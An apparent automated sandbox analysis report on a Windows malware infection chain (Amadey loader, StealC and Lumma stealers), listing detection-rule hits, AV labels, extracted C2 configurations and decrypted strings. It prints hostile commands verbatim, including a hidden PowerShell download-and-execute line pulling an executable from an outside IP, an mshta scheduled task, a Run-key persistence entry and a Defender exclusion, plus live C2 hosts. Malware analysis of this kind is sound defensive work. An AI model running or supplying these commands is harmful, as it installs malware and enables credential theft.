Data: Command: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, CommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4476, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, ProcessId: 3272, ProcessName: schtasks.exe

Source: Process started
Author: Michael Haag
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4828, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 1228, ProcessName: powershell.exe

Source: Process started
Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe", ParentImage: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe, ParentProcessId: 7656, ParentProcessName: DLTDCR8UJINP8YM8Y.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 2496, ProcessName: chrome.exe

Source: Registry Key set
Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
Data: Details: C:\Users\user\AppData\Local\Temp\1026818021\am.cmd, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 8160, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am.cmd

Source: Process started
Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4828, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 1228, ProcessName: powershell.exe
                                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4828, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 1228, ProcessName: powershell.exe
                                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp', CommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe, ParentProcessId: 7812, ParentProcessName: eXbhgU9.exe, ProcessCommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp', ProcessId: 1888, ProcessName: powershell.exe
                                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4828, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 1228, ProcessName: powershell.exe
                                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp', CommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe, ParentProcessId: 7812, ParentProcessName: eXbhgU9.exe, ProcessCommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp', ProcessId: 1888, ProcessName: powershell.exe
                                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7500, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ProcessId: 420, ProcessName: powershell.exe

Data Obfuscation

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4828, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 1228, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: 5EfYBe3nch.exe, Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.phpET, Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/freebl3.dllNQM, Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpmT, Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/X, Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/5, Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/api92, Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/K, Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/e, Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dllnPm, Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpiS, Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php-S0, Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/apiM, Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop:443/api, Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/api), Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpyD, Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe, Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe, Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe, Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\iSHmPkn[1].exe, Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe, Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}
Source: 5EfYBe3nch.exe.7268.0.memstrmin, Malware Configuration Extractor: LummaC {"C2 url": ["nearycrepso.shop", "rabidcowse.shop", "cloudewahsj.shop", "wholersorie.shop", "framekgirus.shop", "abruptyopsn.shop", "noisycuttej.shop", "tirepublicerj.shop", "fancywaxxers.shop"], "Build id": "W0uk--"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe, ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\iSHmPkn[1].exe, ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\am[1].exe, ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\eXbhgU9[1].exe, ReversingLabs: Detection: 30%
Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe, ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe, ReversingLabs: Detection: 30%
Source: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe, ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\1027024001\am.exe, ReversingLabs: Detection: 44%
Source: C:\YQNZByFp\jyidkjkfhjawd.exe, ReversingLabs: Detection: 63%
Source: 5EfYBe3nch.exe, Virustotal: Detection: 57%
Source: 5EfYBe3nch.exe, ReversingLabs: Detection: 68%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1027024001\am.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\iSHmPkn[1].exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\eXbhgU9[1].exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\am[1].exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe, Joe Sandbox ML: detected
Source: 5EfYBe3nch.exe, Joe Sandbox ML: detected
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: 185.215.113.43
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: /Zu7JuNko/index.php
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: S-%lu-
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: abc3bc1985
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: skotes.exe
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: Startup
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: cmd /C RMDIR /s/q
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: rundll32
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: Programs
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: %USERPROFILE%
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: cred.dll|clip.dll|
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: cred.dll
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: clip.dll
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: http://
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: https://
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: /quiet
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: /Plugins/
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: &unit=
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: shell32.dll
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: kernel32.dll
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: GetNativeSystemInfo
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: ProgramData\
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: AVAST Software
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: Kaspersky Lab
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: Panda Security
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: Doctor Web
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: 360TotalSecurity
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: Bitdefender
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: Norton
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: Sophos
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: Comodo
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: WinDefender
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: 0123456789
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: ------
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: ?scr=1
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: ComputerName
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: -unicode-
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: VideoID
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: DefaultSettings.XResolution
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: DefaultSettings.YResolution
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: ProductName
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: CurrentBuild
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: rundll32.exe
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: "taskkill /f /im "
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: " && timeout 1 && del
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: && Exit"
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: " && ren
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: Powershell.exe
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: -executionpolicy remotesigned -File "
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: shutdown -s -t 0
Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, String decryptor: random
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: INSERT_KEY_HERE
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: 07
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: 01
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: 20
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: 25
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: GetProcAddress
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: LoadLibraryA
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: lstrcatA
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: OpenEventA
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: CreateEventA
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: CloseHandle
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: Sleep
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: GetUserDefaultLangID
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: VirtualAllocExNuma
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: VirtualFree
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: GetSystemInfo
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: VirtualAlloc
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: HeapAlloc
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: GetComputerNameA
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: lstrcpyA
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: GetProcessHeap
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: GetCurrentProcess
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: lstrlenA
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: ExitProcess
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: GlobalMemoryStatusEx
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: GetSystemTime
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: SystemTimeToFileTime
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: advapi32.dll
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: gdi32.dll
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: user32.dll
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: crypt32.dll
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: GetUserNameA
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: CreateDCA
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: GetDeviceCaps
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: ReleaseDC
